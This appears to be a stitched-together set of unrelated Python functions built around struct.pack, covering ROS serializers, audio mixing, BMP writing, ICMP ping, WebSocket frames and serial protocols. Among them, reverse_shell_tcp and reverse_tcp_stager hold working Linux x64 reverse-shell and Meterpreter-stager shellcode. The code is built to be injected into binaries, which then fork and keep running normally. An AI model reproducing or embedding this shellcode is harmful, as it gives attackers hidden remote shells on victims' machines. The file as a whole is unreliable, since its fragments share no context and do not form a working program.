def serialize(self, buff): """ serialize message into buffer :param buff: buffer, ``StringIO`` """ try: _x = self.agent_one length = len(_x) if python3 or type(_x) == unicode: _x = _x.encode("utf-8") length = len(_x) buff.write(struct.pack("<I%ss" % length, length, _x)) _x = self.agent_two length = len(_x) if python3 or type(_x) == unicode: _x = _x.encode("utf-8") length = len(_x) buff.write(struct.pack("<I%ss" % length, length, _x)) _x = self buff.write( _struct_6d.pack(_x.rotationx, _x.rotationy, _x.angle, _x.referencex, _x.referencey, _x.evaluation) ) except struct.error as se: self._check_types(struct.error("%s: '%s' when writing '%s'" % (type(se), str(se), str(_x)))) except TypeError as te: self._check_types(ValueError("%s: '%s' when writing '%s'" % (type(te), str(te), str(_x))))
def proc_gentlink(self):
    # get GENL (generic netlink) header info
    cmd = 'TASKSTATS\0'
    mlen = len(cmd) + 4
    msg_ts = array.array(str('B'))
    msg_ts.fromstring(struct.pack("BBxx", CTRL_CMD_GETFAMILY, 0))
    msg_ts.fromstring(struct.pack("HH", mlen, CTRL_ATTR_FAMILY_NAME))
    msg_ts.fromstring(cmd)
    tmp = ((4 - (len(msg_ts) % 4)) & 0x3)
    msg_ts.fromstring('\0' * ((4 - (len(cmd) % 4)) & 0x3))
    nlmhdr_msg = array.array(str('B'),
                             struct.pack(str('=IHHII'), len(msg_ts) + 16,
                                         NETLINK_GENERIC, NLM_F_REQUEST, 0, 0))
    nlmhdr_msg.extend(msg_ts)
    self.socket.send(nlmhdr_msg)
    data = self.socket.recv(65536)  # (16384)
    data = self.unpack_nlhdr(data)
    data = self.unpack_genlhdr(data)
    while len(data) > 0:
        data = self.unpack_attr_hdr(data)
        # if self.flags & 0x2 == 0:
    if debug > 0:
        print "End of receiving message!"
    return
def ConvertXmlToTHCsv(xmlfile):
    tree = ET.parse(xmlfile)
    THCsv = tree.getroot()
    if THCsv.tag != 'THCsv':
        return
    blockcount = len(THCsv)
    rows = []
    for row in THCsv:
        textlist = []
        for text in row:
            textlist.append(text.find('sc').text)
        rows.append(textlist)
    csv = open(os.path.splitext(xmlfile)[0], 'wb')
    csv.write(struct.pack('<I', len(rows)))
    for row in rows:
        csv.write(struct.pack('<I', len(row)))
        for text in row:
            text = text.encode('936')
            csv.write(struct.pack('<I', len(text)))
            csv.write(text)
def serialize(self, buff): """ serialize message into buffer :param buff: buffer, ``StringIO`` """ try: _x = self buff.write(_struct_3I.pack(_x.header.seq, _x.header.stamp.secs, _x.header.stamp.nsecs)) _x = self.header.frame_id length = len(_x) if python3 or type(_x) == unicode: _x = _x.encode('utf-8') length = len(_x) buff.write(struct.pack('<I%ss'%length, length, _x)) _x = self buff.write(_struct_4i.pack(_x.count, _x.nch, _x.length, _x.data_bytes)) length = len(self.src) buff.write(_struct_I.pack(length)) for val1 in self.src: length = len(val1.wavedata) buff.write(_struct_I.pack(length)) pattern = '<%sf'%length buff.write(struct.pack(pattern, *val1.wavedata)) except struct.error as se: self._check_types(se) except TypeError as te: self._check_types(te)
def serialize(self): r = "" r += struct.pack("<Q", self.nServices) r += self.pchReserved r += socket.inet_aton(self.ip) r += struct.pack(">H", self.port) return r
def mix_files(a, b, c, chann=2, phase=-1.):
    f1 = wave.open(a, 'r')
    f2 = wave.open(b, 'r')
    f3 = wave.open(c, 'w')
    f3.setnchannels(chann)
    f3.setsampwidth(2)
    f3.setframerate(44100)
    f3.setcomptype('NONE', 'Not Compressed')
    frames = min(f1.getnframes(), f2.getnframes())
    print "Mixing files, total length %.2f s..." % (frames / 44100.)
    d1 = f1.readframes(frames)
    d2 = f2.readframes(frames)
    for n in range(frames):
        if not n % (5 * 44100):
            print n // 44100, 's'
        if chann < 2:
            d3 = struct.pack('h',
                             .5 * (struct.unpack('h', d1[2*n:2*n+2])[0] +
                                   struct.unpack('h', d2[2*n:2*n+2])[0]))
        else:
            d3 = (struct.pack('h',
                              phase * .3 * struct.unpack('h', d1[2*n:2*n+2])[0] +
                              .7 * struct.unpack('h', d2[2*n:2*n+2])[0]) +
                  struct.pack('h',
                              .7 * struct.unpack('h', d1[2*n:2*n+2])[0] +
                              phase * .3 * struct.unpack('h', d2[2*n:2*n+2])[0]))
        f3.writeframesraw(d3)
    f3.close()
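# Hedged usage sketch for mix_files above (not part of the original source;
# file names and tone parameters are made up). It writes two short mono,
# 16-bit, 44.1 kHz test tones with the wave module and then mixes them into a
# stereo file, panning each input mostly toward one channel.
import math
import struct
import wave

def _write_tone(path, freq, seconds=1):
    # Hypothetical helper: generate a sine tone in the sample format
    # mix_files expects (mono, 16-bit, 44.1 kHz).
    w = wave.open(path, 'w')
    w.setnchannels(1)
    w.setsampwidth(2)
    w.setframerate(44100)
    samples = ''.join(struct.pack('h', int(10000 * math.sin(2 * math.pi * freq * n / 44100.)))
                      for n in range(44100 * seconds))
    w.writeframes(samples)
    w.close()

_write_tone('tone_a.wav', 440)
_write_tone('tone_b.wav', 660)
mix_files('tone_a.wav', 'tone_b.wav', 'mixed.wav', chann=2, phase=-1.)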
def reverse_shell_tcp(self, flItms, CavesPicked={}):
    """
    Modified from metasploit payload/linux/x64/shell_reverse_tcp
    to correctly fork the shellcode payload and continue normal execution.
    """
    if self.PORT is None:
        print ("Must provide port")
        return False
    # 64bit shellcode
    self.shellcode1 = "\x6a\x39\x58\x0f\x05\x48\x85\xc0\x74\x0c"
    self.shellcode1 += "\x48\xBD"
    self.shellcode1 += struct.pack("<Q", self.e_entry)
    self.shellcode1 += "\xff\xe5"
    self.shellcode1 += ("\x6a\x29\x58\x99\x6a\x02\x5f\x6a\x01\x5e\x0f\x05"
                        "\x48\x97\x48\xb9\x02\x00")
    self.shellcode1 += struct.pack("!H", self.PORT)
    self.shellcode1 += self.pack_ip_addresses()
    self.shellcode1 += ("\x51\x48\x89"
                        "\xe6\x6a\x10\x5a\x6a\x2a\x58\x0f\x05\x6a\x03\x5e\x48\xff\xce"
                        "\x6a\x21\x58\x0f\x05\x75\xf6\x6a\x3b\x58\x99\x48\xbb\x2f\x62"
                        "\x69\x6e\x2f\x73\x68\x00\x53\x48\x89\xe7\x52\x57\x48\x89\xe6"
                        "\x0f\x05")
    self.shellcode = self.shellcode1
    return (self.shellcode1)
def update_sha(sha, f):
    if f:
        sha.update(f.read())
        f.seek(0)
        sha.update(pack('I', filesize(f)))
    else:
        sha.update(pack('I', 0))
def spi_transfer(data):
    if len(data) > 1024:
        data = data[:1024]
    temp = struct.pack(">BH", OPCODE_SPI_TXFR, len(data)) + data
    crc = crc16_buff(temp)
    tx_data = struct.pack(">H", sync) + temp + struct.pack(">H", crc)
    # print "Data in TX Buffer:" + ':'.join(x.encode('hex') for x in tx_data)
    if ser.inWaiting() > 0:
        rx_data = ser.read(ser.inWaiting())
        print "Data in RX Buffer:" + ":".join(x.encode("hex") for x in rx_data)
    ser.write(tx_data)
    time.sleep(1)
    print str(ser.inWaiting()) + " waiting."
    rx_data = ser.read(len(tx_data))
    print "SPI RX Data:" + ":".join(x.encode("hex") for x in rx_data)
    print rx_data
    calc_crc = crc16_buff(rx_data[2:-2])
    if struct.pack(">H", calc_crc) == rx_data[-2:]:
        print "Checksum Match"
    else:
        print "Checksum Fail"
    if ord(rx_data[2]) == OPCODE_SPI_TXFR:
        return rx_data[5:-2]
    else:
        print "No Opcode Found!"
        return rx_data
def sendCMDreceiveATT(self, data_length, code, data):
    checksum = 0
    total_data = ['$', 'M', '<', data_length, code] + data
    for i in struct.pack('<2B%dh' % len(data), *total_data[3:len(total_data)]):
        checksum = checksum ^ ord(i)
    total_data.append(checksum)
    try:
        start = time.time()
        b = None
        b = self.ser.write(struct.pack('<3c2B%dhB' % len(data), *total_data))
        while True:
            header = self.ser.read()
            if header == '$':
                header = header + self.ser.read(2)
                break
        datalength = struct.unpack('<b', self.ser.read())[0]
        code = struct.unpack('<b', self.ser.read())
        data = self.ser.read(datalength)
        temp = struct.unpack('<' + 'h' * (datalength / 2), data)
        self.ser.flushInput()
        self.ser.flushOutput()
        elapsed = time.time() - start
        self.attitude['angx'] = float(temp[0] / 10.0)
        self.attitude['angy'] = float(temp[1] / 10.0)
        self.attitude['heading'] = float(temp[2])
        self.attitude['elapsed'] = round(elapsed, 3)
        self.attitude['timestamp'] = "%0.2f" % (time.time(),)
        return self.attitude
    except Exception, error:
        # print "\n\nError in sendCMDreceiveATT."
        # print "("+str(error)+")\n\n"
        pass
def writev5_1conflicteddata(conflictedentries, reucdata, dirdata):
    global writtenbytes
    for d in sorted(conflictedentries):
        for f in d:
            if d["pathname"] == "":
                filename = d["filename"]
            else:
                filename = d["pathname"] + "/" + d["filename"]
            dirdata[filename]["cr"] = fw.tell()
            try:
                dirdata[filename]["ncr"] += 1
            except KeyError:
                dirdata[filename]["ncr"] = 1
            fwrite(d["pathname"] + d["filename"])
            fwrite("\0")
            stages = set()
            fwrite(struct.pack("!b", 0))
            for i in xrange(0, 2):
                fwrite(struct.pack("!i", d["mode"]))
                if d["mode"] != 0:
                    stages.add(i)
            for i in sorted(stages):
                print i
                fwrite(binascii.unhexlify(d["sha1"]))
            writecrc32()
            for f in reucdata[d]:
                print f
    return dirdata
def writev5_0directories(paths, treeextensiondata):
    offsets = dict()
    subtreenr = dict()
    # Calculate subtree numbers
    for p in sorted(paths, reverse=True):
        splited = p.split("/")
        if p not in subtreenr:
            subtreenr[p] = 0
        if len(splited) > 1:
            i = 0
            path = ""
            while i < len(splited) - 1:
                path += "/" + splited[i]
                i += 1
            if path[1:] not in subtreenr:
                subtreenr[path[1:]] = 1
            else:
                subtreenr[path[1:]] += 1
    for p in paths:
        offsets[p] = writtenbytes
        fwrite(struct.pack("!Q", 0))
        fwrite(p.split("/")[-1] + "\0")
        p += "/"
        if p in treeextensiondata:
            fwrite(struct.pack("!ll", int(treeextensiondata[p]["entry_count"]),
                               int(treeextensiondata[p]["subtrees"])))
            if (treeextensiondata[p]["entry_count"] != "-1"):
                fwrite(binascii.unhexlify(treeextensiondata[p]["sha1"]))
        else:
            # If there is no cache-tree data we assume the entry is invalid
            fwrite(struct.pack("!ii", -1, subtreenr[p.strip("/")]))
    return offsets
def serialize_numpy(self, buff, numpy):
    """
    serialize message with numpy array types into buffer
    :param buff: buffer, ``StringIO``
    :param numpy: numpy python module
    """
    try:
        _x = self
        buff.write(_struct_3I.pack(_x.header.seq, _x.header.stamp.secs, _x.header.stamp.nsecs))
        _x = self.header.frame_id
        length = len(_x)
        if python3 or type(_x) == unicode:
            _x = _x.encode('utf-8')
            length = len(_x)
        buff.write(struct.pack('<I%ss' % length, length, _x))
        _x = self
        buff.write(_struct_2I.pack(_x.status.goal_id.stamp.secs, _x.status.goal_id.stamp.nsecs))
        _x = self.status.goal_id.id
        length = len(_x)
        if python3 or type(_x) == unicode:
            _x = _x.encode('utf-8')
            length = len(_x)
        buff.write(struct.pack('<I%ss' % length, length, _x))
        buff.write(_struct_B.pack(self.status.status))
        _x = self.status.text
        length = len(_x)
        if python3 or type(_x) == unicode:
            _x = _x.encode('utf-8')
            length = len(_x)
        buff.write(struct.pack('<I%ss' % length, length, _x))
        _x = self
        buff.write(_struct_3f.pack(_x.feedback.forward_dist_x, _x.feedback.forward_dist_y, _x.feedback.rotation_dist))
    except struct.error as se:
        self._check_types(se)
    except TypeError as te:
        self._check_types(te)
def save(self, path, items):
    # TODO: purge old cache
    with atomic_file(path) as f:
        c = 0
        f.write(struct.pack("I", c))
        # check is marshalable and compatible with broadcast
        can_marshal = marshalable(items)
        for v in items:
            if can_marshal:
                try:
                    r = 0, marshal.dumps(v)
                except Exception:
                    r = 1, cPickle.dumps(v, -1)
                    can_marshal = False
            else:
                r = 1, cPickle.dumps(v, -1)
            f.write(msgpack.packb(r))
            c += 1
            yield v

        bytes = f.tell()
        if bytes > 10 << 20:
            logger.warning("cached result is %dMB (larger than 10MB)", bytes >> 20)
        # count
        f.seek(0)
        f.write(struct.pack("I", c))
def _write_key_sect(self, outfile):
    # Writes the key section header, key block index, and all the key blocks
    # to outfile.
    # outfile: a file-like object, opened in binary mode.
    keyblocks_total_size = sum(len(b.get_block()) for b in self._key_blocks)
    if self._version == "2.0":
        preamble = struct.pack(b">QQQQQ",
                               len(self._key_blocks),
                               self._num_entries,
                               self._keyb_index_decomp_size,
                               self._keyb_index_comp_size,
                               keyblocks_total_size)
        preamble_checksum = struct.pack(b">L", zlib.adler32(preamble))
        if (self._encrypt):
            preamble = _salsa_encrypt(preamble, self._encrypt_key)
        outfile.write(preamble)
        outfile.write(preamble_checksum)
    else:
        preamble = struct.pack(b">LLLL",
                               len(self._key_blocks),
                               self._num_entries,
                               self._keyb_index_decomp_size,
                               keyblocks_total_size)
        if (self._encrypt):
            preamble = _salsa_encrypt(preamble, self._encrypt_key)
        outfile.write(preamble)
    outfile.write(self._keyb_index)
    for b in self._key_blocks:
        outfile.write(b.get_block())
def tsigverify(pkt, keys, vertime=None):
    if vertime is None:
        vertime = int(time.time())
    if len(pkt.adlist) < 1:
        return proto.FORMERR
    sr = pkt.adlist[-1]
    pkt.adlist = pkt.adlist[:-1]
    if not sr.head.istype("TSIG") or sr.head.rclass != rec.CLASSANY:
        return proto.FORMERR
    for key in keys:
        if key.name == sr.head.name:
            break
    else:
        return proto.BADKEY
    if key.algo.cname != sr.data["algo"]:
        return proto.BADKEY
    pkt.tsigctx = ctx = tsigctx(key, pkt, sr)
    other = sr.data["other"]
    msg = pkt.encode()
    msg += key.name.canonwire()
    msg += struct.pack(">HL", rec.CLASSANY, 0)
    msg += key.algo.cname.canonwire()
    msg += struct.pack(">Q", sr.data["stime"])[-6:]
    msg += struct.pack(">3H", sr.data["fudge"], sr.data["err"], len(other))
    msg += other
    digest = key.sign(msg)
    if digest != sr.data["mac"]:
        pkt.tsigctx = proto.BADSIG
        return proto.BADSIG
    if vertime != 0:
        if abs(vertime - sr.data["stime"]) > sr.data["fudge"]:
            pkt.tsigctx = proto.BADTIME
            return proto.BADTIME
    return key
def get_lockdata():
    if sys.platform.startswith('atheos'):
        start_len = "qq"
    else:
        try:
            os.O_LARGEFILE
        except AttributeError:
            start_len = "ll"
        else:
            start_len = "qq"

    if (sys.platform.startswith(('netbsd', 'freebsd', 'openbsd', 'bsdos'))
            or sys.platform == 'darwin'):
        if struct.calcsize('l') == 8:
            off_t = 'l'
            pid_t = 'i'
        else:
            off_t = 'lxxxx'
            pid_t = 'l'
        lockdata = struct.pack(off_t + off_t + pid_t + 'hh', 0, 0, 0,
                               fcntl.F_WRLCK, 0)
    elif sys.platform in ['aix3', 'aix4', 'hp-uxB', 'unixware7']:
        lockdata = struct.pack('hhlllii', fcntl.F_WRLCK, 0, 0, 0, 0, 0, 0)
    elif sys.platform in ['os2emx']:
        lockdata = None
    else:
        lockdata = struct.pack('hh' + start_len + 'hh', fcntl.F_WRLCK, 0, 0, 0, 0, 0)
    if lockdata:
        if verbose:
            print 'struct.pack: ', repr(lockdata)
    return lockdata
def getRSSI(self):
    """Read the RSSI of the device (a rough nearby/not-nearby indicator); returns None on failure."""
    addr = self.address
    # Open hci socket
    hci_sock = bt.hci_open_dev()
    hci_fd = hci_sock.fileno()
    # Connect to device (to whatever you like)
    bt_sock = bluetooth.BluetoothSocket(bluetooth.L2CAP)
    bt_sock.settimeout(10)
    result = bt_sock.connect_ex((addr, 1))  # PSM 1 - Service Discovery
    try:
        # Get ConnInfo
        reqstr = struct.pack("6sB17s", bt.str2ba(addr), bt.ACL_LINK, "\0" * 17)
        request = array.array("c", reqstr)
        handle = fcntl.ioctl(hci_fd, bt.HCIGETCONNINFO, request, 1)
        handle = struct.unpack("8xH14x", request.tostring())[0]
        # Get RSSI
        cmd_pkt = struct.pack('H', handle)
        rssi = bt.hci_send_req(hci_sock, bt.OGF_STATUS_PARAM,
                               bt.OCF_READ_RSSI, bt.EVT_CMD_COMPLETE, 4, cmd_pkt)
        rssi = struct.unpack('b', rssi[3])[0]
        # Close sockets
        bt_sock.close()
        hci_sock.close()
        return rssi
    except Exception, e:
        return None
def write_mmio_reg(self, phys_address, size, value):
    if size == 8:
        buf = struct.pack('=Q', value)
    elif size == 4:
        buf = struct.pack('=I', value & 0xFFFFFFFF)
    elif size == 2:
        buf = struct.pack('=H', value & 0xFFFF)
    elif size == 1:
        buf = struct.pack('=B', value & 0xFF)
    else:
        return False
    return self.write_phys_mem((phys_address >> 32) & 0xFFFFFFFF,
                               phys_address & 0xFFFFFFFF, size, buf)
def send_one_ping(my_socket, dest_addr, ID):
    """
    Send one ping to the given >dest_addr<.
    """
    dest_addr = socket.gethostbyname(dest_addr)

    # Header is type (8), code (8), checksum (16), id (16), sequence (16)
    my_checksum = 0

    # Make a dummy header with a 0 checksum.
    header = struct.pack("bbHHh", ICMP_ECHO_REQUEST, 0, my_checksum, ID, 1)
    bytesInDouble = struct.calcsize("d")
    data = (192 - bytesInDouble) * "Q"
    data = struct.pack("d", time.time()) + data

    # Calculate the checksum on the data and the dummy header.
    my_checksum = checksum(header + data)

    # Now that we have the right checksum, we put that in. It's just easier
    # to make up a new header than to stuff it into the dummy.
    header = struct.pack(
        "bbHHh", ICMP_ECHO_REQUEST, 0, socket.htons(my_checksum), ID, 1
    )
    packet = header + data
    my_socket.sendto(packet, (dest_addr, 1))  # Don't know about the 1
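# The checksum() helper called above is not defined in this snippet. A minimal
# sketch, assuming it is the usual RFC 1071 one's-complement Internet checksum
# used by the well-known pure-Python ping recipes (this body is an assumption,
# not taken from the original source):
def checksum(source_string):
    csum = 0
    count_to = (len(source_string) // 2) * 2
    for i in range(0, count_to, 2):
        # Sum successive 16-bit words, low byte first.
        this_val = ord(source_string[i + 1]) * 256 + ord(source_string[i])
        csum = (csum + this_val) & 0xffffffff
    if count_to < len(source_string):
        # Odd-length data: add the trailing byte.
        csum = (csum + ord(source_string[-1])) & 0xffffffff
    # Fold the 32-bit sum into 16 bits and take the one's complement.
    csum = (csum >> 16) + (csum & 0xffff)
    csum = csum + (csum >> 16)
    answer = ~csum & 0xffff
    # Swap the two result bytes (the classic ping.py recipe; the caller then
    # applies socket.htons() before packing the final header).
    answer = answer >> 8 | (answer << 8 & 0xff00)
    return answer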
def reverse_tcp_stager(self, flItms, CavesPicked={}):
    """
    FOR USE WITH STAGER TCP PAYLOADS INCLUDING METERPRETER
    Modified from metasploit payload/linux/x64/shell/reverse_tcp
    to correctly fork the shellcode payload and continue normal execution.
    """
    if self.PORT is None:
        print ("Must provide port")
        return False
    # 64bit shellcode
    self.shellcode1 = "\x6a\x39\x58\x0f\x05\x48\x85\xc0\x74\x0c"
    self.shellcode1 += "\x48\xBD"
    self.shellcode1 += struct.pack("<Q", self.e_entry)
    self.shellcode1 += "\xff\xe5"
    self.shellcode1 += ("\x48\x31\xff\x6a\x09\x58\x99\xb6\x10\x48\x89\xd6\x4d\x31\xc9"
                        "\x6a\x22\x41\x5a\xb2\x07\x0f\x05\x56\x50\x6a\x29\x58\x99\x6a"
                        "\x02\x5f\x6a\x01\x5e\x0f\x05\x48\x97\x48\xb9\x02\x00")
    self.shellcode1 += struct.pack("!H", self.PORT)
    self.shellcode1 += self.pack_ip_addresses()
    self.shellcode1 += ("\x51\x48\x89\xe6\x6a\x10\x5a\x6a\x2a\x58\x0f"
                        "\x05\x59\x5e\x5a\x0f\x05\xff\xe6")
    self.shellcode = self.shellcode1
    return (self.shellcode1)
def serialize_numpy(self, buff, numpy):
    """
    serialize message with numpy array types into buffer
    :param buff: buffer, ``StringIO``
    :param numpy: numpy python module
    """
    try:
        _x = self
        buff.write(_struct_3I.pack(_x.header.seq, _x.header.stamp.secs, _x.header.stamp.nsecs))
        _x = self.header.frame_id
        length = len(_x)
        if python3 or type(_x) == unicode:
            _x = _x.encode('utf-8')
            length = len(_x)
        buff.write(struct.pack('<I%ss' % length, length, _x))
        _x = self
        buff.write(_struct_2I.pack(_x.status.goal_id.stamp.secs, _x.status.goal_id.stamp.nsecs))
        _x = self.status.goal_id.id
        length = len(_x)
        if python3 or type(_x) == unicode:
            _x = _x.encode('utf-8')
            length = len(_x)
        buff.write(struct.pack('<I%ss' % length, length, _x))
        buff.write(_struct_B.pack(self.status.status))
        _x = self.status.text
        length = len(_x)
        if python3 or type(_x) == unicode:
            _x = _x.encode('utf-8')
            length = len(_x)
        buff.write(struct.pack('<I%ss' % length, length, _x))
        buff.write(_struct_f.pack(self.feedback.percent_complete))
    except struct.error as se:
        self._check_types(struct.error("%s: '%s' when writing '%s'"
                                       % (type(se), str(se), str(_x))))
    except TypeError as te:
        self._check_types(ValueError("%s: '%s' when writing '%s'"
                                     % (type(te), str(te), str(_x))))
def test_wrap_round_robin(self):
    cluster = Mock(spec=Cluster)
    cluster.metadata = Mock(spec=Metadata)
    hosts = [Host(str(i), SimpleConvictionPolicy) for i in range(4)]
    for host in hosts:
        host.set_up()

    def get_replicas(keyspace, packed_key):
        index = struct.unpack('>i', packed_key)[0]
        return list(islice(cycle(hosts), index, index + 2))

    cluster.metadata.get_replicas.side_effect = get_replicas

    policy = TokenAwarePolicy(RoundRobinPolicy())
    policy.populate(cluster, hosts)

    for i in range(4):
        query = Statement(routing_key=struct.pack('>i', i), keyspace='keyspace_name')
        qplan = list(policy.make_query_plan(None, query))

        replicas = get_replicas(None, struct.pack('>i', i))
        other = set(h for h in hosts if h not in replicas)
        self.assertEqual(replicas, qplan[:2])
        self.assertEqual(other, set(qplan[2:]))

    # Should use the secondary policy
    for i in range(4):
        qplan = list(policy.make_query_plan())
        self.assertEqual(set(qplan), set(hosts))
def writeData(self, f):
    self.offset = f.tell()
    print("BindShape " + str(len(self.bindShape)))
    for b in self.bindShape:
        f.write(struct.pack("<f", b))
    f.write(struct.pack("<I", len(self.joints)))  # joints
    for j in self.joints:
        f.write(struct.pack("<I", len(j.reference) + 1))  # mesh
        f.write(bytearray('#', "ascii"))
        f.write(bytearray(j.reference, "ascii"))
    f.write(struct.pack("<I", len(self.joints) * 16))  # joints
    for b in self.jointBindPoses:
        f.write(struct.pack("<f", b))
    # Omit bounding box
    # f.write(struct.pack("<f", 0))  # Omit bounding box
    # f.write(struct.pack("<f", 0))  # Omit bounding box
    # f.write(struct.pack("<f", 0))  # Omit bounding box
    # f.write(struct.pack("<f", 0))  # Omit bounding box
    # f.write(struct.pack("<f", 0))  # Omit bounding box
    # f.write(struct.pack("<f", 0))  # Omit bounding box
    # Omit bounding sphere
    # f.write(struct.pack("<f", 0))  # Omit bounding sphere
    # f.write(struct.pack("<f", 0))  # Omit bounding sphere
    # f.write(struct.pack("<f", 0))  # Omit bounding sphere
    # f.write(struct.pack("<f", 0))  # Omit bounding sphere
    return
def serialize(self): r = "" r += struct.pack("<i", self.nVersion) r += ser_vector(self.vin) r += ser_vector(self.vout) r += struct.pack("<I", self.nLockTime) return r
def encode_hybi(buf, opcode, base64=False):
    """ Encode a HyBi style WebSocket frame.
    Optional opcode:
        0x0 - continuation
        0x1 - text frame (base64 encode buf)
        0x2 - binary frame (use raw buf)
        0x8 - connection close
        0x9 - ping
        0xA - pong
    """
    if base64:
        buf = b64encode(buf)

    b1 = 0x80 | (opcode & 0x0f)  # FIN + opcode
    payload_len = len(buf)
    if payload_len <= 125:
        header = pack('>BB', b1, payload_len)
    elif payload_len > 125 and payload_len < 65536:
        header = pack('>BBH', b1, 126, payload_len)
    elif payload_len >= 65536:
        header = pack('>BBQ', b1, 127, payload_len)

    # self.msg("Encoded: %s", repr(header + buf))

    return header + buf, len(header), 0
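# Hedged usage sketch for encode_hybi above (not from the original source).
# Assuming the snippet's imports are in scope (from struct import pack, and
# from base64 import b64encode), short payloads get a 2-byte header, payloads
# longer than 125 bytes a 4-byte header (16-bit extended length), and payloads
# of 64 KiB or more a 10-byte header (64-bit extended length).
frame, header_len, _ = encode_hybi('hello', 0x1)
assert header_len == 2 and len(frame) == 2 + 5

frame, header_len, _ = encode_hybi('x' * 200, 0x2)
assert header_len == 4

frame, header_len, _ = encode_hybi('x' * 65536, 0x2)
assert header_len == 10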
def __init__(self, fp, bits, width, height):
    self.fp = fp
    self.bits = bits
    self.width = width
    self.height = height
    if bits == 1:
        ncols = 2
    elif bits == 8:
        ncols = 256
    elif bits == 24:
        ncols = 0
    else:
        raise ValueError(bits)
    self.linesize = align32((self.width * self.bits + 7) / 8)
    self.datasize = self.linesize * self.height
    info = struct.pack('<IiiHHIIIIII',
                       40, self.width, self.height, 1, self.bits,
                       0, self.datasize, 0, 0, 0, 0)
    assert len(info) == 40, len(info)
    header = struct.pack('<ccIHHI',
                         'B', 'M', 14 + 40 + self.datasize, 0, 0, 14 + 40)
    assert len(header) == 14, len(header)
    self.fp.write(header)
    self.fp.write(info)
    if ncols == 2:
        self.fp.write('\x00\x00\x00\xff\xff\xff')
    elif ncols == 256:
        for i in xrange(256):
            # Grayscale palette entries; 'B' (unsigned) so values 128-255 pack
            # without overflowing the signed-byte range.
            self.fp.write(struct.pack('BBB', i, i, i))
    self.pos0 = self.fp.tell()
    self.pos1 = self.pos0 + self.datasize
    return
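# align32() is referenced above but not defined in this snippet. A minimal
# sketch of what it presumably does (an assumption, not from the original
# source): round a scanline byte count up to the next multiple of four, since
# BMP rows are 32-bit aligned.
def align32(nbytes):
    return (nbytes + 3) // 4 * 4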
def serialize_numpy(self, buff, numpy):
    """
    serialize message with numpy array types into buffer
    :param buff: buffer, ``StringIO``
    :param numpy: numpy python module
    """
    try:
        _x = self
        buff.write(_struct_if.pack(_x.a, _x.b))
        _x = self.c
        length = len(_x)
        if python3 or type(_x) == unicode:
            _x = _x.encode('utf-8')
            length = len(_x)
        if python3:
            buff.write(struct.pack('<I%sB' % length, length, *_x))
        else:
            buff.write(struct.pack('<I%ss' % length, length, _x))
        buff.write(self.d.tostring())
        length = len(self.e)
        buff.write(_struct_I.pack(length))
        pattern = '<%sd' % length
        buff.write(self.e.tostring())
    except struct.error as se:
        self._check_types(struct.error("%s: '%s' when writing '%s'"
                                       % (type(se), str(se), str(_x))))
    except TypeError as te:
        self._check_types(ValueError("%s: '%s' when writing '%s'"
                                     % (type(te), str(te), str(_x))))
def __init__(self, is_binary, file_name):
    self.magic = struct.pack('3s', "SFP")
    self.file_type = struct.pack('b', is_binary)
    self.sfile_name = file_name
    self.data = ''
    self.sfilesize = 0
    self.random_data()
def readBlock(self, adr, length, filename):
    print('Read block')
    f = file(filename, 'wb')
    pkt = struct.pack('>I', adr)
    command = struct.pack('B', self.MTK_COMMAND_READ16)
    self._port.write(command)
    if self._port.read(1) != command:
        raise Exception('Invalid response command')
    self._port.write(pkt)
    if self._port.read(4) != pkt:
        raise Exception('Invalid response address')
    pkt = struct.pack('>I', length)
    self._port.write(pkt)
    if self._port.read(4) != pkt:
        raise Exception('Invalid response length')
    var = self._port.read(length * 2)
    # Swap each adjacent pair of bytes before writing the 16-bit words out.
    out = ''.join([c for t in zip(var[1::2], var[::2]) for c in t])
    f.write(out)
    f.close()